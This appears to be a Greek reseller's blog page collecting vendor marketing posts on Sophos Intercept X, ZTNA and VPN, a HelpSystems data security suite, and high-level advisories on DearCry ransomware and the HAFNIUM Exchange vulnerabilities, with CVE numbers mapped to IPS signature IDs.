Η θεμελιώδης signature-based τεχνολογία σταματά επίσης τις γνωστές απειλές.

Όποιες συσκευές και πλατφόρμες και να χρησιμοποιείτε, το Intercept X σας καλύπτει πλήρως:

  • Το Intercept X endpoint προστατεύει επιτραπέζιους υπολογιστές με Windows και macOS
  • Το Intercept X for Server προστατεύει τους διακομιστές Windows και Linux είτε on-premises είτε στο cloud.
  • Το Intercept X προστατεύει επίσης εικονικούς επιτραπέζιους υπολογιστές που είναι ευάλωτοι από τις ίδιες απειλές που είναι και οι φυσικοί φορητοί υπολογιστές.
  • Και το Intercept X for Mobile προστατεύει φορητές συσκευές με Android, iOS και Chromebook.

Σταματήστε τις καθοδηγούμενες από ανθρώπους επιθέσεις με καθοδηγούμενο από ανθρώπους threat hunting

Οι πλέον καταστροφικές κυβερνοαπειλές συνήθως περιλαμβάνουν επιθέσεις υπό την ηγεσία και την καθοδήγηση κάποιου ανθρώπου συχνά εκμεταλλευόμενου νόμιμων εργαλείων και διαδικασιών όπως είναι το PowerShell.

Το hands-on live hacking επιτρέπει στους εισβολείς να παρακάμπτουν προϊόντα και πρωτόκολλα ασφαλείας τροποποιώντας επί τόπου τις τακτικές, τις τεχνικές και τις διαδικασίες τους (TTP).

Η διακοπή αυτών των καθοδηγούμενων από ανθρώπους επιθέσεων απαιτεί ένα κυνήγι απειλών υπό ανθρώπινη καθοδήγηση.

 Κυνηγήστε απειλές με το Sophos EDR

 Intercept X με EDR – Endpoint Detection and Response – σας παρέχει όλα τα εργαλεία για να πραγματοποιήσετε το δικό σας κυνήγι απειλών από την ίδια κονσόλα Sophos που χρησιμοποιείτε και για να διαχειριστείτε την προστασία endpoint και server σας.

Είναι το πρώτο EDR που σχεδιάστηκε για αναλυτές του τομέα της ασφάλειας και διαχειριστές πληροφορικής για να είστε σε θέση να προσθέσετε εμπειρογνωμοσύνη και εξειδίκευση χωρίς να αυξήσετε τον αριθμό του προσωπικού.

Επιπλέον, το Intercept X EDR εκτός από το ότι σας επιτρέπει να διερευνήσετε ύποπτα σημάδια και απειλές, σας δίνει επίσης τη δυνατότητα να βελτιώσετε την υγιεινή IT σας και να εντοπίσετε ζητήματα διαμόρφωσης/ ρύθμισης που σας αφήνουν εκτεθειμένους. Κάποιες συνήθεις περιπτώσεις χρήσης περιλαμβάνουν:

  • Προσδιορισμός ενδείξεων για απόπειρες παραβίασης
  • Διερεύνηση επιθέσεων ηλεκτρονικού ψαρέματος
  • Επιδιόρθωση προβλημάτων όταν ο Chrome «τρέχει» αργά
  • Διαχείριση της συμμόρφωσης λογισμικού και των αδειών χρήσης

«Στρατολογήστε» τους ειδικούς κυνηγούς απειλών της Sophos

Αν δεν έχετε τον χρόνο, την ικανότητα ή τις δεξιότητες για να κυνηγήσετε οι ίδιοι τις απειλές, η υπηρεσία Sophos Managed Threat Response είναι στη διάθεση σας για να σας βοηθήσει.

Η ομάδα εμπειρογνωμόνων της Sophos παρέχει δυνατότητες ανίχνευσης και ανταπόκρισης 24 ώρες το 24ωρο, 7 ημέρες την εβδομάδα, οι οποίες παρέχονται ως πλήρως διαχειριζόμενη υπηρεσία. Η ομάδα της Sophos κυνηγά προληπτικά και επικυρώνουν πιθανές απειλές και βεβαίως αποτρέπει περιστατικά προτού προκαλέσουν οποιαδήποτε βλάβη.

Προστατεύστε συσκευές χωρίς να συμβιβαστείτε σε θέματα απορρήτου

Όσον αφορά την προστασία του εργατικού δυναμικού σας, λάβετε υπόψη σας επίσης: τις συσκευές που ανήκουν στους εργαζόμενους σας, γνωστές και ως BYOD. Ως ομάδα πληροφορικής, θέλετε να διαχειρίζεστε και να προστατεύετε τόσο τις εταιρικές όσο και τις προσωπικές συσκευές χωρίς να διακυβεύεται το απόρρητο των χρηστών τους.

Το Sophos Mobile είναι μια ενοποιημένη λύση διαχείρισης τερματικών συσκευών, η οποία ενσωματώνεται με το Sophos Intercept X για να προσφέρει δυνατότητες διαχείρισης των συσκευών Windows 10, macOS, iOS και Android.

Η λύση της Sophos σας επιτρέπει να διασφαλίσετε οποιονδήποτε συνδυασμό προσωπικών και εταιρικών συσκευών με ελάχιστη κόπο και είναι ιδανική για κάθε σενάριο BYOD.

Προστασία του απανταχού οργανισμού

Για να μάθετε περισσότερα σχετικά με τον τρόπο που η Sophos μπορεί να σας βοηθήσει να δώσετε στους χρήστες σας τη δυνατότητα να εργάζονται με ασφάλεια χρησιμοποιώντας οποιαδήποτε συσκευή από οποιαδήποτε τοποθεσία, διαβάστε το whitepaper «Securing the Anywhere Organisation».

Πηγή: Sophos

22

Μαρ

[vc_row][vc_column][vc_column_text]Τα δεδομένα είναι το πλέον πολύτιμο περιουσιακό στοιχείο κάθε οργανισμού, ανεξάρτητα από το μέγεθος, τη θέση ή τη βιομηχανία στην οποία λειτουργεί.

Στις μέρες μας, οι επιχειρήσεις κατέχουν περισσότερα δεδομένα από ποτέ, παράγοντας, λαμβάνοντας, αποστέλλοντας και αποθηκεύοντας ολοένα και μεγαλύτερο όγκο δεδομένων. Σήμερα επίσης υπάρχουν και περισσότεροι νόμοι και κανονισμοί για την διακυβέρνηση των δεδομένων, οι οποίοι απαιτούν από τους οργανισμούς να τα προστατεύουν από την μη εξουσιοδοτημένη πρόσβαση. Όμως παράλληλα, δυστυχώς, γίνονται ολοένα και περισσότερες παραβιάσεις δεδομένων, με αποτέλεσμα οι οργανισμοί να πληρώνουν το αντίτιμο, με μεγάλα πρόστιμα και σημαντικές απώλειες σε πελάτες και στη φήμη τους. Αναμφισβήτητα, το σημερινό περιβάλλον πληροφορικής έχει πολλές προκλήσεις και είναι ιδιαίτερα δύσκολο περιβάλλον, ειδικά σήμερα που η εξ αποστάσεως εργασίας αποτελεί μία μόνιμη πραγματικότητα για πολλούς οργανισμούς και επιχειρήσεις των οποίων οι υπάλληλοι πρέπει να εργάζονται και να συνεργάζονται με ασφάλεια από οπουδήποτε.

Το κλειδί για να προστατεύσετε τα δεδομένα είναι η ορατότητα

Σε μια πρόσφατη μελέτη της Helpsystems, της μητρικής εταιρείας της Boldon James, οι CISOs συμφωνούν ότι η ορατότητα πάνω στα δεδομένα αποτελεί τη μεγαλύτερη αδυναμία στην κυβερνοασφάλεια. Πως μπορούν οι οργανώσεις να ελέγχουν, να διαχειρίζονται και εν τέλει να προστατεύουν αποτελεσματικά τα δεδομένα τους αν δεν γνωρίζουν ποια δεδομένα έχουν, που βρίσκονται, αν είναι κοινόχρηστα και ποιος έχει πρόσβαση σε αυτά; Η κατανόηση των παραπάνω πληροφοριών βελτιώνει σημαντικά την ικανότητα οποιασδήποτε εταιρείας να διαχειρίζεται και να ελέγχει τα δεδομένα της και επιπλέον την βοηθά να επιλέξει τη σωστή τεχνολογία για να διασφαλίσει ότι θα προστατεύονται και θα είναι ασφαλή καθ΄ όλη τη διάρκεια της ζωής τους.

Παραδοσιακά, η ασφάλεια δεδομένων επικεντρωνόταν στον έλεγχο της υποδομής – και των δικτύων και των συσκευών που λειτουργούν εντός αυτής – στο «κλείδωμα» των δεδομένων και στον σκληρό έλεγχο του ποιος έχει πρόσβαση σε αυτά. Αν και αυτή η στρατηγική είναι η ασφαλέστερη αυτή η στρατηγική, ταυτόχρονα καθιστά τη συνεργασία δυσκολότερη και στην πλειονότητα των περιπτώσεων οδηγεί σε κακή παραγωγικότητα.

Οι σύγχρονες λύσεις ασφαλείας δεδομένων εστιάζουν στο να προστατεύσουν τα ίδια τα δεδομένα. Αυτό σημαίνει ότι οι οργανισμοί μπορούν να επωφεληθούν πλήρως από τις εφαρμογές που βασίζονται στο σύννεφο και να λειτουργούν αποτελεσματικά σε υβριδικά περιβάλλοντα, καθώς η τεχνολογία προστατεύει και εξασφαλίζει τα δεδομένα ανεξάρτητα από το που εδρεύουν ή πως «ταξιδεύουν». Τα οικοσυστήματα ασφαλείας δεδομένων λειτουργούν για να ελαχιστοποιούν αυτόματα τόσο τις εσωτερικές όσο και τις εξωτερικές απειλές – όπως στην περίπτωση ενός υπαλλήλου που μοιράζεται κατά λάθος ευαίσθητα δεδομένα με το λάθος πρόσωπο ή με κάποιον κακόβουλο παράγοντα που κοιτάζει πως να «απελευθερώσει» το κακόβουλο λογισμικό του όταν ο υπάλληλος ανοίξει ή τρέξει κάποιο αρχείο που εκ πρώτης όψης δεν μοιάζει ύποπτο ή αναξιόπιστο.

Η λύση ασφάλειας δεδομένων της Helpsystems

Η Helpsystems κατανοεί ότι η πρόκληση της ασφάλειας των δεδομένων δεν είναι κάτι που μπορεί να λυθεί εν μία νυκτί από έναν οργανισμό. Τα σχέδια ασφάλειας δεδομένων απαιτούν χρόνο να εφαρμοστούν και μια αρθρωτή λύση, όπου μία επιχείρηση μπορεί να εφαρμόσει αρχικά ένα στοιχείο, να το αξιοποιήσει και να προσθέσει αξία και στη συνέχεια να προχωρήσει στο επόμενο επίπεδο, προσφέρει το μεγαλύτερο επίπεδο ευελιξίας. Η σουίτα ασφάλειας δεδομένων Helpsystems προσφέρει πολλές λύσεις ασφαλείας που μπορούν να εφαρμοστούν ανεξάρτητα η μία από την άλλη ή μαζί, ώστε οι εταιρείες να μπορούν να επωφεληθούν από οικονομίες κλίμακας. Κάθε λύση προσθέτει ένα επίπεδο ασφάλειας στα δεδομένα, από τη στιγμή που δημιουργούνται μέχρι να φτάσουν στον προορισμό τους και ακόμη παραπέρα.

Πως λειτουργεί

Παρακάτω μπορείτε να δείτε ένα παράδειγμα του τρόπου λειτουργίας της σουίτας ασφαλείας δεδομένων της Helpsystems, όταν οι διάφορες αρθρωτές λύσεις χρησιμοποιούνται μαζί ως μια σουίτα προϊόντων. Κάθε λύση έχει το δικό της σύνολο δυνατοτήτων, και στο παρακάτω παράδειγμα επισημαίνονται μόνο μερικές από τις διαθέσιμες λειτουργίες.

 

Τα δεδομένα εισέρχονται στον οργανισμό και τα δικαιώματα βάσει ρόλου συμβάλλουν στη διασφάλιση ότι είναι ασφαλή για προβολή εντός του οργανισμού.

Όταν αυτά τα δεδομένα αποθηκεύονται (στο συγκεκριμένο παράδειγμα ως αρχείο XLS), ταξινομούνται με βάση το πόσο πολύτιμα ή πόσο ευαίσθητα είναι για την επιχείρηση. Οι ετικέτες μεταδεδομένων επιπλέον δίνουν την δυνατότητα στις υπόλοιπες λύσεις ασφάλειας δεδομένων εντός του οικοσυστήματος να κατανοήσουν ότι τα δεδομένα είναι ευαίσθητα και απαιτούν περαιτέρω προστασία βάσει εταιρικής πολιτικής. Τέτοια δεδομένα ενδέχεται να περιλαμβάνουν πληροφορίες πελατών ή υπαλλήλων, πνευματική ιδιοκτησία, οικονομικές πληροφορίες ή πληροφορίες που αφορούν συμβόλαια και συμβάσεις κ.ά.

Όταν τα δεδομένα χρειαστεί να αποσταλθούν με ασφάλεια μέσω ηλεκτρονικού ταχυδρομείου ή μέσω του διαδικτύου, το περιεχόμενό τους ελέγχεται και επιθεωρείται. Τα μεταδεδομένα παρέχουν τις πληροφορίες που απαιτούνται για τη μεταφορά δεδομένων με τρόπο που να ικανοποιεί τις πολιτικές και τους κανονισμούς.

Η λύση της Helpsystems ελέγχει επίσης αν το άτομο που αποστέλλει/ λαμβάνει τα δεδομένα είναι εξουσιοδοτημένο να κάνει κάτι τέτοιο, και αν πράγματι είναι, κρυπτογραφεί τα δεδομένα για να διασφαλίσει την ασφάλεια τους. Στην περίπτωση που τα δεδομένα δεν έχουν ταξινομηθεί, αλλά εξακολουθούν να περιέχουν ευαίσθητες πληροφορίες, όπως αριθμούς πιστωτικών καρτών ή προσωπικά ταυτοποιήσιμα στοιχεία (PII) το περιεχόμενο μπορεί αυτόματα να αποκλειστεί ή να ανακληθεί.

Τέλος, τα δεδομένα που εγκρίνονται σύμφωνα με την εταιρική πολιτική για κοινή χρήση εσωτερικά ή εξωτερικά μεταφέρονται με ασφάλεια, ανεξάρτητα από το μέγεθος του αρχείου.

Οι λύσεις που περιλαμβάνει η σουίτα Helpsystems :

Προστασία πολύτιμων δεδομένων υγειονομικής περίθαλψης

Ακολουθεί ένα παράδειγμα όπου η λύση ασφάλειας δεδομένων HelpSystems εφαρμόστηκε σταδιακά για την προστασία πολύτιμων δεδομένων υγειονομικής περίθαλψης που αποστέλλονται και λαμβάνονται μέσω email:

Ένας πάροχος υγειονομικής περίθαλψης (π.χ. νοσοκομεία, κλινικές) πρέπει να παραμένει συμμορφωμένος με τον νόμο HIPAA και να προστατεύει τα ιατρικά δεδομένα που μοιράζεται μεταξύ νοσοκομείων και ασφαλιστικών οργανισμών.

Σε πρώτη φάση εφαρμόστηκε η λύση DLP για να διασφαλιστεί με αυτόματο τρόπο ότι τα ιατρικά δεδομένα κοινοποιούνται μόνο σε εκείνους που έχουν εξουσιοδοτηθεί να τα λαμβάνουν. Η λύση αναγνωρίζει τυχόν ευαίσθητα δεδομένα σε μηνύματα ηλεκτρονικού ταχυδρομείου και, αναλόγως τον παραλήπτη, μπορεί να κρυπτογραφήσει, να αποκλείσει ή να ανακαλέσει το περιεχόμενο τους για να διασφαλιστεί η κανονιστική συμμόρφωση. Όλα αυτά τα πολύτιμα δεδομένα που διατηρούν οι πάροχοι υγειονομικής περίθαλψης, καθιστούν τους τελευταίους υποψήφιους στόχους κυβερνοεγκληματιών και κακόβουλων παραγόντων που επιθυμούν να κλέψουν τα δεδομένα, όποτε η λύση Helpsystems επιθεωρεί και διασφαλίζει ότι οποιαδήποτε κρυμμένα δεδομένα ή κακόβουλο λογισμικό αφαιρείται επίσης αυτόματα, παρέχοντας επιπλέον προστασία από τις παραβιάσεις δεδομένων.

Σε δεύτερη φάση πραγματοποιείται ταξινόμηση δεδομένων, ώστε ο πάροχος υγειονομικής περίθαλψης να ενισχύσει περαιτέρω τη συμμόρφωση του με τους κανονισμούς μέσω της σωστής διαχείρισης τυχόν απόρρητων πληροφοριών.

Προστασία εξαιρετικά εμπιστευτικών πληροφοριών

Όταν ένας οργανισμός χρειάζεται να κοινοποιεί εμπιστευτικές πληροφορίες σε τακτική βάση, χρειάζεται μια λύση διαχειριζόμενης μεταφοράς αρχείων (MFT), η οποία προσφέρει έναν ασφαλή και βολικό τρόπο μεταφοράς μεγάλων αρχείων. Η λύση MFT μπορεί να προστατεύσει τα ευαίσθητα δεδομένα που συχνά κοινοποιούνται από οργανισμούς χρηματοοικονομικών υπηρεσιών, από δικηγορικά γραφεία ή νομικά τμήματα μεγάλων επιχειρήσεων, όπως για παράδειγμα είναι έγγραφα, συμβόλαια και επιστολές, και να διασφαλίσει ότι οι πληροφορίες παραμένουν κρυπτογραφημένες κατά τη μεταφορά τους.

Αν απαιτηθεί πρόσθετη ασφάλεια για τη διατήρηση του ελέγχου ακόμα και μετά την αποστολή ή τη λήψη των δεδομένων, τότε είναι δυνατή η εφαρμογή περαιτέρω πολιτικών ελέγχου της πρόσβασης που παραμένουν με τα δεδομένα καθ’ όλη τη διάρκεια του κύκλου ζωής τους. Η ασφαλής κοινή χρήση αρχείων διασφαλίζει ότι τα εμπιστευτικά δεδομένα μπορούν να παρακολουθούνται, να ελέγχονται και να ανακαλούνται ανά πάσα στιγμή, ανεξάρτητα από το που ή πως μεταφέρονται.

Είστε έτοιμοι να ξεκινήσετε;

Αν θέλετε να δείτε τα εργαλεία που περιλαμβάνονται στο Data Security Suite σε δράση, μπορείτε να παρακολουθήσετε αυτό το 6λεπτο βίντεο για μία επίδειξη. Το βίντεο δείχνει πως η λύση Helpsystems μπορεί αυτόματα να ανακαλέσει ευαίσθητα δεδομένα (PII) από μηνύματα ηλεκτρονικού ταχυδρομείου και πως διαβάζει τα μεταδεδομένα των απόρρητων πληροφοριών για να εφαρμόσει την κατάλληλη πολιτική.

Πηγή: Boldon James[/vc_column_text][/vc_column][/vc_row][vc_row row_height_percent=”0″ overlay_alpha=”50″ gutter_size=”3″ column_width_percent=”100″ shift_y=”0″ z_index=”0″ css=”.vc_custom_1616421039768{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}”][vc_column width=”1/1″][vc_separator sep_color=”color-210407″ type=”dashed”][/vc_column][/vc_row][vc_row][vc_column column_width_percent=”100″ align_horizontal=”align_center” gutter_size=”3″ overlay_alpha=”50″ shift_x=”0″ shift_y=”0″ shift_y_down=”0″ z_index=”0″ medium_width=”0″ mobile_width=”0″ width=”1/1″][vc_custom_heading text_color=”color-210407″]

Επικοινωνήστε μαζί μας για να μάθετε περισσότερα για τις λύσεις που παρέχουμε

[/vc_custom_heading][/vc_column][/vc_row][vc_row row_height_percent=”0″ overlay_alpha=”50″ gutter_size=”1″ column_width_percent=”100″ shift_y=”0″ z_index=”0″][vc_column width=”1/3″][contact-form-7 id=”100339″][/vc_column][vc_column width=”1/3″][/vc_column][vc_column column_width_percent=”100″ gutter_size=”3″ back_color=”color-gyho” overlay_alpha=”50″ preserve_border=”yes” border_color=”color-150912″ border_style=”solid” shift_x=”0″ shift_y=”0″ shift_y_down=”0″ z_index=”0″ medium_width=”0″ mobile_width=”0″ css_animation=”zoom-in” width=”1/3″][vc_column_text]

Καλέστε μας

 

+30 210 591 4326

 

+30 211 8000 330

[/vc_column_text][/vc_column][/vc_row]

19

Μαρ

Το DearCry είναι ένα νέο στέλεχος ransomware που εκμεταλλεύεται τις ίδιες ευπάθειες στο Microsoft Exchange με την απειλή Hafnium.

To DearCry δημιουργεί κρυπτογραφημένα αντίγραφα των αρχείων που έχουν δεχτεί την επίθεση και διαγράφει τα πρωτότυπα. Η κρυπτογράφηση που χρησιμοποιεί το DearCry βασίζεται σε ένα κρυπτοσύστημα δημοσίου κλειδιού. Το δημόσιο κλειδί κρυπτογράφησης είναι ενσωματωμένο, κάτι που σημαίνει ότι δεν απαιτείται επικοινωνία με κάποιον διακομιστή command-and-control για να κρυπτογραφηθούν τα αρχεία σας.

Λάβετε υπόψη σας, ότι ακόμα και οι διακομιστές Microsoft Exchange που έχουν ρυθμιστεί να επιτρέπουν την πρόσβαση στο Διαδίκτυο μόνο για τις υπηρεσίες Exchange παραμένουν ευάλωτοι και μπορούν να κρυπτογραφηθούν. Και χωρίς το κλειδί αποκρυπτογράφησης (το οποίο βρίσκεται στην κατοχή του εισβολέα) δεν είναι δυνατή η αποκρυπτογράφηση.

Σταματώντας το ransomware DearCry

Το Sophos Intercept X εντοπίζει και αποκλείει το ransomware DearCry τόσο με την προστασία CryptoGuard όσο και με προστασίες που βασίζονται σε υπογραφή.

Αν έχετε προβλήματα με το DearCry, σημαίνει ότι οι επιτιθέμενοι έχουν επωφεληθεί από το «persistence» που καθιερώθηκε από την ομάδα Hafnium. Είναι επομένως απαραίτητο να αποκλείσετε το ransomware DearCry και παράλληλα να εξουδετερώσετε και τους επιτιθέμενους προτού καταφέρουν να πραγματοποιήσουν περαιτέρω επιθέσεις.

Προστατεύστε το δίκτυο σας από μελλοντικές επιθέσεις

Στον απόηχο του Hafnium, δεν είναι λίγοι οι παράγοντες που ξεκίνησαν να εκμεταλλεύονται ζητήματα Exchange/ Proxy Logon για να εξαπολύσουν σειρά επιθέσεων.

Όποιος διατηρεί διακομιστές Microsoft Exchange στις εγκαταστάσεις του, θα πρέπει να προχωρήσει επειγόντος στην εφαρμογή patches και ενημερώσεων καθώς και να αναζητήσει στο εταιρικό δίκτυο τυχόν σημάδια επίθεσης.

Όμως το patching δεν αρκεί από μόνο του για να πείτε ότι είστε προστατευμένοι. Είναι απαραίτητο να ερευνήσετε για ενδείξεις επίθεσης και παραβίασης καθώς υπάρχει περίπτωση κάποιος κακόβουλος να έχει ήδη αξιοποιήσει τις ευπάθειες.

Για αναλυτικές οδηγίες σχετικά με το πως μπορείτε να προσδιορίσετε αν έχετε επηρεαστεί μπορείτε να επισκεφτείτε την ιστοσελίδα της Sophos, εδώ.

Για βοήθεια σχετικά με τον εντοπισμό και την εξουδετέρωση ενδεχόμενης εχθρικής δραστηριότητας στο περιβάλλον σας, επικοινωνήστε με την ομάδα Sophos MTR.

Πηγή: Sophos

16

Μαρ

Δεν υπάρχει καμία αμφιβολία ότι η πανδημία οδήγησε σε τεράστια αύξηση της εξ αποστάσεως εργασίας. Τον Μάιο του 2020 το 62% των απασχολούμενων Αμερικανών εργαζόταν από το σπίτι (WFH), όταν πριν την πανδημία του νέου κορωνοϊού εργαζόταν μόλις το 7%.

Παρόλα αυτά, η τάση για εξ αποστάσεως εργασία προϋπήρχε της πανδημίας και πολλοί υπάλληλοι γραφείου είχαν προχωρήσει ήδη στη μετάβαση (εργασία από το σπίτι) για ορισμένες ημέρες της εβδομάδας. Στο Ηνωμένο Βασίλειο, η εξ αποστάσεως εργασία αυξήθηκε σε ποσοστό 74% την τελευταία δεκαετία ενώ στην Αυστραλία, περίπου το ένα τρίτο του εργατικού δυναμικού εργαζόταν συχνά από το σπίτι.

Ταυτόχρονα, οι κυβερνοεγκληματίες παραμόνευαν τους απομακρυσμένους εργαζόμενους, πολλές φορές χρησιμοποιώντας τους ως κερκόπορτες αποκτώντας πολλαπλά σημεία εισόδου και διεισδύοντας σε οργανισμούς γρήγορα. 

Προστατεύοντας τους εργαζομένους σε οποιαδήποτε τοποθεσία

Η εξ αποστάσεως εργασίας είναι μία κατάσταση «win-win»,τόσο για τις εταιρείες όσο και για το προσωπικό. Οι εργαζόμενοι εξοικονομούν χρόνο και κόστη μετακίνησης ενώ απολαμβάνουν επιπλέον ευελιξία και είναι περισσότερο παραγωγικοί. Παράλληλα, οι οργανισμοί μειώνουν λειτουργικά έξοδα και ποσοστά εναλλαγής υπαλλήλων. 

Όμως για τις ομάδες πληροφορικής, η μακρόχρονη απομακρυσμένη εργασία δημιουργεί πρόσθετες προκλήσεις στον τομέα της ασφάλειας. Είτε οι υπάλληλοι συνδέονται από το σαλόνι τους, είτε επισκέπτονται κάποιον πελάτη ή απολαμβάνουν τον καφέ τους σερφάροντας συνδεδεμένοι σε κάποιο Wi-Fi access point, το δίκτυο και τα δεδομένα πρέπει να παραμένουν πάντα προστατευμένα.

Με τη Sophos, οι χρήστες σας μπορούν να συνδεθούν γρήγορα, αποτελεσματικά και με ασφάλεια από οπουδήποτε. Η Sophos μάλιστα προσφέρει τόσο τη παραδοσιακή λύση του VPN όσο και τη νέα πρόταση της που «ακούει» στο όνομα ZTNA, Zero-Trust Network Access. 

Sophos VPN

Στη συντριπτική πλειοψηφία τους, οι απομακρυσμένοι υπάλληλοι συνδέονται με πόρους στο γραφείο ή με πόρους στο cloud (SaaS ή Public Cloud) μέσω VPN. H Sophos έχει μακρά ιστορία ενεργοποίησης ασφαλών απομακρυσμένων συνδέσεων VPN με το Sophos Firewall. Μάλιστα υπάρχουν δύο επιλογές:

  1. Η πρώτη είναι με τον Sophos Connect, έναν δωρεάν, εύχρηστο VPN client που «τρέχετε» στις συσκευές σας. Απλός στο deployment και στις ρυθμίσεις του, ο Sophos Connect παρέχει στους απομακρυσμένους χρήστες ασφαλή πρόσβαση σε πόρους στο εταιρικό σας δίκτυο ή στο δημόσιο cloud από συσκευές Windows και macOS. Τελευταία, είναι εξαιρετικά δημοφιλής καθώς η Sophos αυτή τη περίοδο μετράει περισσότερους από 1,4 εκατομμύρια ενεργούς πελάτες. 
  2. Υπάρχει επίσης η λύση SD-RED, μια απομακρυσμένη συσκευή Ethernet τύπου plug-and-play που συνδέει υποκαταστήματα, γραφεία και απομακρυσμένα άτομα με το κεντρικό -εταιρικό- δίκτυο (φυσικό ή cloud). Είναι η απόλυτη προστασία για προστασία μικρών ή οικιακών γραφείων με always-on VPN ή split-tunnel VPN που είναι εύκολο στο deployment και στην διαχείριση του παρέχοντας διάφορες ευέλικτες δυνατότητες και επιλογές. Επιπλέον είναι αρκετά μικρό σε μέγεθος και φορητό – περίπου το μέγεθος μιας παλιάς συσκευής αναπαραγωγής DVD – και επομένως είναι ιδανικό για όποιον χρειάζεται πρόσβαση μέσω ασφαλούς σύνδεσης ανά πάσα στιγμή και από οποιαδήποτε τοποθεσία.

 

Sophos ZTNA: Το μέλλον της ασφαλούς συνδεσιμότητας

Πολλοί οργανισμοί σήμερα ζητούν πολλά περισσότερα από όσα σχεδιάστηκε να προσφέρει το VPN και εδώ είναι που εισέρχεται το Sophos ZTNA ή Sophos Zero Trust Network Access, η νέα λύση απομακρυσμένης πρόσβασης της Sophos. Όπως υποδηλώνει και η ονομασία, το ZTNA εξαλείφει την έννοια της «υπονοούμενης» εμπιστοσύνης σε ένα άτομο βάσει μόνο της παρουσίας του στο δίκτυο.

Το Sophos ZTNA, είναι μια εξαιρετική εναλλακτική πρόταση στο VPN και επιτρέπει στους χρήστες να συνδέονται με εταιρικούς πόρους από οποιαδήποτε τοποθεσία με απλό και διαφανή τρόπο. Ταυτόχρονα, ενισχύει την προστασία και ελαχιστοποιεί τον κίνδυνο της μετακίνησης από υπολογιστή σε υπολογιστή στο εσωτερικό δίκτυο, αξιολογώντας συνεχώς την ταυτότητα και την υγεία της συσκευής πριν παραχωρήσει άδεια πρόσβασης.

Το Sophos ZTNA διασφαλίζει ότι η συσκευή του χρήστη είναι εγγεγραμμένη, ενημερωμένη, σωστά προστατευμένη και ότι ενεργοποιημένη αυτόματη κρυπτογράφηση. Ακολούθως, χρησιμοποιεί αυτές τις πληροφορίες για να λαμβάνει αποφάσεις βάσει προσαρμοσμένων πολιτικών για τον καθορισμό της πρόσβασης χρήστη και των προνομίων στις κρίσιμες σημασίας δικτυακές εφαρμογές σας.

Το Sophos ZTNA προστατεύει οποιαδήποτε δικτυακή εφαρμογή, είτε φιλοξενείται στο εταιρικό δίκτυο στις εγκαταστάσεις μιας εταιρείας (on-premises) ή στο δημόσιο cloud είτε σε οποιαδήποτε τοποθεσία hosting. Παρέχει κάλυψη για τα πάντα, από την πρόσβαση του Remote Desktop Protocol (RDP) σε κοινόχρηστα αρχεία δικτύου, μέχρι εφαρμογές όπως η Jira, wiki’s, αποθετήρια πηγαίου κώδικα μέχρι για εφαρμογές υποστήριξης και ticketing και πολλές άλλες.

Το Sophos ZTNA διαθέτει τρία βασικά στοιχεία:

  1. Ο ZTNA client είναι εγκατεστημένος στις συσκευές των χρηστών, παρέχοντας μια διαφανή εμπειρία χρήσης που ενσωματώνει την υγεία της συσκευής και την ταυτότητα του χρήστη. Είναι εύκολος στην εγκατάσταση/ ανάπτυξη παράλληλα με τον Intercept X endpoint, καθώς για τους πελάτες που χρησιμοποιούν και τα δύο προϊόντα της Sophos, μπορεί να γίνει εγκατάσταση ενός client. Όμως μπορεί να λειτουργήσει σε συνδυασμό και με οποιαδήποτε άλλη λύση endpoint. Αρχικά, υποστηρίζει μόνο το λειτουργικό σύστημα Windows, ωστόσο σύντομα θα υποστηρίζει τόσο υπολογιστές Mac όσο και φορητές συσκευές.
  1. Το Sophos Central είναι η πλατφόρμα διαχείρισης cloud για οτιδήποτε έχει να κάνει με τη Sophos, συμπεριλαμβανομένου και του Sophos ZTNA. Χρησιμοποιήστε το Sophos Central για deployment, για να ορίσετε λεπτομερείς πολιτικές ελέγχου σχετικά με το ποιος μπορεί να έχει πρόσβαση σε ποιες εφαρμογές και υπό ποιες συνθήκες καθώς και για reporting.
  1. Η ZTNA Gateway είναι software-based και VM-based τόσο για εφαρμογές public cloud όσο και για deployments σε εικονικά περιβάλλοντα on-premises. Επαληθεύει διαρκώς και επικυρώνει την ταυτότητα των χρηστών και την υγεία της συσκευής για να παρέχει ασφαλή πρόσβαση σε εφαρμογές και δεδομένα βάσει πολιτικής ενώ κοινοποιεί δεδομένα που αφορούν συμβάντα ή αρχεία καταγραφής στο Sophos Central. Οι χρήστες μπορούν επίσης να συνδεθούν στη ZTNA Gateway για να βλέπουν και να εκκινούν εύκολα όλες τις εφαρμογές στις οποίες έχουν εξουσιοδοτηθεί να έχουν πρόσβαση.

Για περισσότερες πληροφορίες για το Sophos ZTNA και για να το δοκιμάσετε μέσω του προγράμματος πρώιμης πρόσβασης επισκεφθείτε την ιστοσελίδα www.sophos.com/ztna.

Πηγή: Sophos

13

Μαρ

Οι πελάτες της Sophos είναι προστατευμένοι από την αξιοποίηση των νέων zero-day ευπαθειών στο Microsoft Exchange.

Τέσσερις νέες ευπάθειες zero-day που επηρεάζουν το Microsoft Exchange αξιοποιούνται αυτή τη περίοδο από μία νέα απειλή με την ονομασία HAFNIUM, μία ομάδα από χάκερς, πίσω από την οποία πιστεύεται ότι κρύβεται κάποιο κράτος.

Όσοι τρέχουν στις εγκαταστάσεις τους Exchange Servers θα πρέπει να τους αναβαθμίσουν/ επιδιορθώσουν με τις τελευταίες ενημερώσεις χωρίς καθυστέρηση καθώς και να αναζητήσουν στα δίκτυα τους τυχόν ενδείξεις επίθεσης.

Οι προστασίες της Sophos από την απειλή HAFNIUM

Οι πελάτες ασφάλειας δικτύου, τερματικών συσκευών και MTR της Sophos επωφελούνται από πολλαπλές προστασίες ενάντια στην αξιοποίηση των νέων ευπαθειών.

Sophos MTR

Η ομάδα Sophos MTR παρακολουθεί τα περιβάλλοντα των πελατών της Sophos για συμπεριφορές που ενδέχεται να σχετίζονται με τις συγκεκριμένες ευπάθειες από την ώρα που έγιναν γνωστές. Μόλις η ομάδα της Sophos ανιχνεύσει το παραμικρό, όπως κακόβουλη δραστηριότητα εξαιτίας των ευπαθειών, θα δημιουργήσει μία υπόθεση και θα απευθυνθεί σε εσάς άμεσα.

Sophos Firewall

Υπογραφές IPS για πελάτες που τρέχουν SFOS και XFOS:

CVE SID
CVE-2021-26855 57241, 57242, 57243, 57244, 2305106, 2305107
CVE-2021-26857 57233, 57234
CVE-2021-26858 57245, 57246
CVE-2021-27065 57245, 57246

Οι συγκεκριμένες υπογραφές βρίσκονται επίσης και στο Endpoint IPS εντός του Intercept X Advanced.

Υπογραφές IPS για πελάτες που τρέχουν Sophos UTM:

CVE SID
CVE-2021-26855 57241, 57242, 57243, 57244
CVE-2021-26857 57233, 57234
